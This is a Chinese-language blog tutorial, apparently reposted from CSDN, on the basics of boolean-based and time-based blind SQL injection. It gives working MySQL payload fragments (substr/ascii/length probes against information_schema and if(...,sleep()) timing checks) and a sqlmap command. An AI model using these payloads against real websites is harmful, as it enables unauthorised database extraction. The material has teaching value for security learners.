-
盲注原理基础
注意:仅用于技术讨论,切勿用于其他用途,一切后果与本人无关!!!
一、盲注介绍
盲注=>没有回显点
1.页面没有输出点
盲注:
1.布尔盲注(能判对错)
and database()="hjw123" 假如数据库是对的话页面有数据
2.时间盲注(能判时间)
and sleep(10) -- qwe 如果是时间盲注则页面有延迟
二、盲注需要掌握的几个函数
substr(字符串,从哪开始截,截多长) 字符串从1开始
length(字符串) 输出长度
三、盲注的做法
and length(database())>6 判断出长度
and substr(database(),1,1)="a" 判断出数据库名
也可用 ascii(substr(database(),1,1))>96 判断出库名
and length((select table_name from information_schema.tables where table_schema=database())) 判断出表名长度(注意length里面是子查询记得括号)
and substr((select table_name from information_schema.tables where table_schema=database()),1,1) >100 判断出表名
小技巧:
1.Burp
爆破模块
2.python脚本(sqlmap\自己写)
python sqlmap.py -r D:\桌面\1.txt -delay 1 --level 3 --risk 2 -datch
若需要闭合就手动帮闭合下
Mysql注入小技巧方法- Track 知识社区 - 掌控安全在线教育 - Powered by 掌控者
四、延时输入(时间注入)
if(条件,成立执行,不成立执行)
case when 条件 then 成立执行 else 不成立执行 end (Mysql里的三目运算)
and if(length(database())>12,0,sleep(4)) 判断出数据库长度
and if(ascii((substr(database(),1,1)))) 判断出数据库第一个字母的ascii值
接下来的做法都是差不多的
-
相关阅读:
记录我在实际项目中针对微服务特性做的一些测试
反射填充详解ReflectionPad2d(padding)
css取消移动端长按元素背景色
2.最长公共子串
回归预测 | Matlab实现CPO-BiTCN-BiGRU冠豪猪算法优化双向时间卷积门控循环单元多变量回归预测
python抓取制定产品图片及简介代码实现
OpenCV图像加载、显示与保存
Day25_8 Java学习之UDP通信程序
(续)SSM整合之springmvc笔记(拦截器)(P164-168)
Go学习圣经:队列削峰+批量写入 超高并发原理和实操
- 原文地址:https://blog.csdn.net/qq_58000413/article/details/126871720